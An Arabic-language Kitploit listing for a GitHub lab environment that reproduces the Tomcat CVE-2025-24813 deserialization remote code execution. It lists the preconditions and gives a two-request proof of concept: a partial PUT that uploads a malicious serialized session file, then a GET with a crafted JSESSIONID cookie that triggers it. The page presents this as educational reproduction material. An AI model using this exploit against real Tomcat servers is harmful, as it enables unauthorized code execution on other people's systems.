Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-24813 — tomcat CVE-2025-24813 反序列化RCE环境 | Kitploit
أدوات/GitHubGitHub/x1ongsec/cve-2025-24813
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubx1ongsec/cve-2025-24813

CVE-2025-24813

tomcat CVE-2025-24813 反序列化RCE环境

عرض المستودع
28منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

وصف

هذا المستودع هو البيئة المخصصة لإعادة إنتاج ثغرة RCE الأخيرة في Tomcat CVE-2025-24813.

للاستخدام التعليمي والبحثي فقط!

شروط الاستغلال

  • يقوم التطبيق بتمكين ميزة الكتابة لـ DefaultServlet، والتي تكون معطلة افتراضيًا.
  • يدعم التطبيق طلبات PUT الجزئية (partial PUT)، مما يسمح بكتابة بيانات تسلسل ضارة إلى ملفات الجلسة، وهذه الميزة مفعلة افتراضيًا.
  • يستخدم التطبيق استمرارية جلسة الملفات في Tomcat ويستخدم موقع تخزين الجلسة الافتراضي، وهذا يتطلب تكوينًا إضافيًا.
  • يحتوي التطبيق على مكتبة تحتوي على ثغرة إلغاء التسلسل، مثل commons-collections الموجودة في مسار الفئات، وهذا الشرط يعتمد على ما إذا كانت تبعيات التطبيق تحتوي على مكتبة ذات سلسلة استغلال لإلغاء التسلسل.

هذه البيئة قد مكّنت الشروط المذكورة أعلاه لإعادة الإنتاج.

تشغيل Tomcat

Linux:

root@kitploit:~
chmod +x apache-tomcat-9.0.98/bin/*
apache-tomcat-9.0.98/bin/catalina.sh run

Windows:

root@kitploit:~
apache-tomcat-9.0.98/bin/catalina.bat run

الوصول: http://127.0.0.1:9001/

image

POC

إنشاء ملف تسلسل ضار، واستخدام حزمة البيانات التالية لرفعه. يجب ملاحظة أن قيمة النطاق (Range) يجب أن تتطابق مع Length، وتكون أكبر من طول الملف الحالي.

root@kitploit:~
PUT /xxxxx/session HTTP/1.1  
Host: 192.168.131.32:8080  
Content-Length: 1000  
Content-Range: bytes 0-1000/1200  

{{محتويات ملف إلغاء التسلسل}}

استخدام POC التالي للتفعيل:

root@kitploit:~
GET / HTTP/1.1  
Host: 192.168.131.32:8080  
Cookie: JSESSIONID=.xxxxx
image image

المرجع: https://forum.butian.net/article/674

تنزيل الأداة